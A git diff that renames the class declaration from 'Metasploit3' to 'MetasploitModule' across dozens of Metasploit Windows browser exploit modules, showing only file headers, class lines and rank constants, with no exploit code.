--- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index 52425ef4c4..c8a8cbcec7 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb index d6c31e3ecb..5817b6720e 100644 --- a/modules/exploits/windows/browser/java_mixer_sequencer.rb +++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index bed81f6b2e..063a6aef3d 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_double_quote.rb b/modules/exploits/windows/browser/java_ws_double_quote.rb index f57b207b6d..87ac933b9f 100644 --- a/modules/exploits/windows/browser/java_ws_double_quote.rb +++ b/modules/exploits/windows/browser/java_ws_double_quote.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index e832ba3f89..74323a296a 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # 
diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index c72124cf60..12a30108ab 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index c6cce237eb..04f1329b5c 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb index 4502c63b37..601a07fd74 100644 --- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb +++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 4397a6b09a..96f993ef29 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML 
diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index 4f9d33b47f..9dd79abcbb 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index d3a8fb15d1..038cb41bda 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index dc41c99c65..c15b5dcd61 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/malwarebytes_update_exec.rb b/modules/exploits/windows/browser/malwarebytes_update_exec.rb index db740e9bdd..7714407a8c 100644 --- a/modules/exploits/windows/browser/malwarebytes_update_exec.rb +++ b/modules/exploits/windows/browser/malwarebytes_update_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # Would be Great except MBAE doesn't version check include Msf::Exploit::EXE 
diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb index 89d894554c..f501d3b651 100644 --- a/modules/exploits/windows/browser/maxthon_history_xcs.rb +++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index ff4cf01a15..0bd3a05ebf 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb index 2d39cac1ad..eca4fd4e7d 100644 --- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb +++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 525a9b842d..9828cf2c15 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML 
diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index e5ab64c876..e8877e1ed5 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb index 7cba8400bc..e431231c46 100644 --- a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb +++ b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb index 06ef17e639..635d5fc3be 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb index ac509c6e3d..3af07119d9 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb 
@@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 509d30f471..be9b94bf4a 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 6f5fcddffe..351ab5261d 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb index 287360a20a..6b09d042d0 100644 --- a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb +++ b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index 496bbf0123..46ba71e46e 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index 7f378c62e7..2a78db1bb5 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 068a4c1a46..afe4d9aa3e 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms05_054_onload.rb b/modules/exploits/windows/browser/ms05_054_onload.rb index 300685a93e..9027e3b800 100644 --- a/modules/exploits/windows/browser/ms05_054_onload.rb +++ b/modules/exploits/windows/browser/ms05_054_onload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index 65f8e87a6b..56b3424194 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 8a7966917d..a2f3bf5b41 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index bf5f1f7495..ec0c79bc03 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index 16b12abc37..958c1649d1 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index 775de5a215..fe0e20f400 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 98c92b6610..533beb1042 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index ebe1eb2403..812cd9d774 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index b53071abb3..09f40510e4 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index fc5f2e8ab7..e069312a05 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index 8834323960..bddfbd2985 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index 9d941bb40b..d1bb4018fe 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb index 3f2dc970a4..fb953019b4 100644 --- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb +++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb index 4c883ed1f3..5d223c0b62 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index 548fc18a29..8bef321090 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index e31cd4d028..db5edffd29 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb index bb682e0e02..41e2c4b8f7 100644 --- a/modules/exploits/windows/browser/ms10_002_aurora.rb +++ b/modules/exploits/windows/browser/ms10_002_aurora.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb index 5ba8df594e..c8c48f817f 100644 --- a/modules/exploits/windows/browser/ms10_002_ie_object.rb +++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index 38abad66ba..3bc77c655b 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index ef07915e4a..205ab89161 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index 497cd2818f..097cae4618 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index f6283f3c4d..a0d8c78154 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index 3b272637f1..d6f2f8e684 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index 76165d8a84..5e71f5dabc 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index 74898d9b7d..fa32a72eb7 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index cbb1e33a3e..00a7558b92 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # Need more love for Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb index 037424e5c5..8d6ebad0b1 100644 --- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb +++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb index 51c62c2f9b..b31eaf3ef2 100644 --- a/modules/exploits/windows/browser/ms11_081_option.rb +++ b/modules/exploits/windows/browser/ms11_081_option.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb index ce333b7c93..b382a1498c 100644 --- a/modules/exploits/windows/browser/ms11_093_ole32.rb +++ b/modules/exploits/windows/browser/ms11_093_ole32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index 22dcfc7b6a..16cec1843d 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb index de2192eb00..af516188b1 100644 --- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb +++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb index 6d6b762169..ae82b71a96 100644 --- a/modules/exploits/windows/browser/ms12_037_same_id.rb +++ b/modules/exploits/windows/browser/ms12_037_same_id.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb index a0302f48dc..66098c6c37 100644 --- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb +++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include 